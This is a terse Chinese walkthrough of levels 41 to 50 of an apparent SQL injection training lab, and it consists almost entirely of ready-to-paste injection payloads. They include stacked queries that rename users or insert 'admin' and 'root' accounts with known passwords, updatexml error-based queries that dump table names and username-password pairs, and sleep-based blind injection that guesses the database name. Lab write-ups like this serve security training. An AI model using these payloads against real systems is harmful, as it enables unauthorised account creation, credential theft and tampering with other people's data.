第四十一关
数字型注入, 更改用户名
?id=1;update users set username='123456' where username='Dumb'--+
执行后
第四十二关
抓包,尝试添加账号密码
login_user=1&login_password=1';insert into users(id,username,password) values ('42','admin','123456')--+&mysubmit=Login
登录
第四十三关
同上关,闭合修改为 ')
login_user=1&login_password=1'); insert into users(id,username,password) values ('43','root','123456')--+&mysubmit=Login
第四十四关
同四十二关,语句一样
第四十五关
同四十三关,语句一样
第四十六关
参数变了,让我们使用sort参数,1,2,3都是数据库表,只是排序不一样
想要注入的话,使用updatexml进行
库
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)
数据
?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(username,'-',password) from users),0x5c),1))
第四十七关
多了一个单引号闭合,可以使用报错注入
表
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+
库
?sort=1' and updatexml(1,concat(0x7e,(select concat(username,':',password) from users limit 0,1)),1)--+
第四十八关
数字型注入,不返回报错信息,使用时间盲注
?sort=1 AND IF(LENGTH(database())=8,sleep(1),1)--+
?sort=1 AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+
?sort=1 AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+
第四十九关
同上关,闭合多一个 '
?sort=1' AND IF(LENGTH(database())=8,sleep(1),1)--+
?sort=1' AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+
?sort=1' AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+
第五十关
同四十六关,不过也能使用堆叠注入
?sort=-1;insert into users(id,username,password) values ('50','abc','123')
执行后,再次sort=1,添加成功
